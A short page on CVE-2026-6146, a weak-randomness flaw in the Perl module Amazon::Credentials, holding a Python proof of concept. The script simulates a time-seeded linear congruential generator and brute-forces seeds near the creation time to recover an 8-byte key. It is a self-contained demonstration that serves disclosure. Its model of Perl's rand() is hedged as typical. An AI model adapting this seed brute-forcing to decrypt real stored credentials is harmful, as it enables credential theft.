CVE-2026-6146 Amazon::Credentials弱随机数漏洞

#!/usr/bin/env python3 """ PoC for CVE-2026-6146 (Weak Randomness in Amazon::Credentials) This script demonstrates how to brute force the seed of Perl's rand() to recover a weakly generated encryption key. """ import random import time # Simulating Perl's rand() behavior (Standard LCG) # Perl typically uses: state = (state * 1103515245 + 12345) & 0x7fffffff RAND_MAX = 0x7fffffff def perl_rand(state): state = (state * 1103515245 + 12345) & RAND_MAX return state / (RAND_MAX + 1.0), state def generate_vulnerable_key(seed): """Simulates the vulnerable key generation logic.""" state = seed key_bytes = b'' # Simulating generating a 64-bit key (8 bytes) using rand() for _ in range(8): val, state = perl_rand(state) key_bytes += bytes([int(val * 256)]) return key_bytes # Scenario: Attacker obtained the encrypted blob and knows the creation time window print("[+] Simulating vulnerability...") # 1. Victim generates a key based on current timestamp (seed) victim_seed = int(time.time()) victim_key = generate_vulnerable_key(victim_seed) print(f"[Victim] Generated Key (Hex): {victim_key.hex()}") # 2. Attacker attempts to recover the key by guessing the seed print("[Attacker] Brute-forcing seed based on time...") start_time = victim_seed - 100 end_time = victim_seed + 100 recovered = False for potential_seed in range(start_time, end_time): test_key = generate_vulnerable_key(potential_seed) if test_key == victim_key: print(f"[SUCCESS] Key recovered! Seed: {potential_seed}") print(f"[SUCCESS] Recovered Key: {test_key.hex()}") recovered = True break if not recovered: print("[-] Failed to recover key within time window.")